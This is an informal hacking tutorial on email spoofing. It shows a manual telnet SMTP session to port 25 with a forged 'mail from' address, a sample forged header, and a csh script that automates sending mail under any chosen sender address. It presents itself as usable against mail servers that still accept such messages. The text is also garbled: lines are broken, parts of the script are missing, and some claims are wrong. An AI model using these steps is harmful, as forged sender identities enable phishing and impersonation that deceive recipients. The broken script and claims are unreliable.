What is email Spoofing?
Email Spoofing is a
method in which the attacker spoofs his id and send mail to the victim from the
spoofed id.Wondering, yes this is possible because of some flaws in the SMTP
server. SMTP server is the server which helps you in sending emails.
Ok here we will use a
tool known as telnet about which we will learn later.
Let me give you an example and then explain you:
the before being involved in email forging.I want to tell you that here I have
telnetted to port 25 of gmail.com.The port 25 of all computer run sendmail
(note the part where
numbers are written is not written by me they are response I got after typing
the commands.Example:250-smtp.gmail.com)
helo gmail.com
This is the part in
which we have to introduce our self to the server.
mail from: hello.hacker@gmail.com
In this line we have to
write the email id of the person from whom we are sending the email.In this
case it is hello.hacker@gmail.com.
rcpt to: alice@yahoo.co.in
In this line we have to
tell the server to whom this email should be sent.
After typing this
command we have to type the text that should be included in the email.
This command should be
included if you want the mail to have a subject. And after this you can press
enter and start writing the text that you want to include in the email.
And at last you haves to
type “.” to tell the server that the message is ended.
And it will send the
message to the target.
Another thing in email
forging is if you want to send the message to multiple people you can type
“rcpt to:”many number of
Now after sending the
above email the header generated will be:
Return-Path: <hello.hacker@gmail.com>
Received: from gmail.com
Date: Fri, 7 Jul 2:24:50
From: rahul mehta
Subject: Forge email
Here is a simple unix
shell script that when executed can do the samething:
#! /bin/csh -fB
### This is a simple
shell script for easy use of anonymous mail. To run the
### program just save it
and delete everything up until the #! /bin/csh -fB
### line. Then just type
the name you save it as or the name and whoever
if ($1 != "")
set mto=$1
echo 'To: '
set mto=$<
echo -n 'From: '
set mfrom=$<
echo -n 'Use which host
for smtp (return for '`hostname`') ? '
set usehost=$<
echo -n 'Use which
editor (return for vi)? '
set editor=$<
=="") then
set editor=vi
if ($mfrom ==
"") then
echo 'helo amail'
>> tmpamail1
echo 'mail from: '$mfrom
>> tmpamail1
echo 'rcpt to: '$mto
>> tmpamail1
echo 'data' >>
$editor tmpamail2
echo -n 'Are you sure
you want to send this? '
set yorn=$<
if($yorn == 'y') then
echo . >>
echo quit >>
cat tmpamail2 >>
telnet $usehost 25 <
tmpamail1 > /dev/null
echo 'Mail has been sent
to: '$mto
echo ' From: '$mfrom
rm tmpamail1 tmpamail2
Now this is not working
in gmail because they have fixed it but hey this will work in other mail
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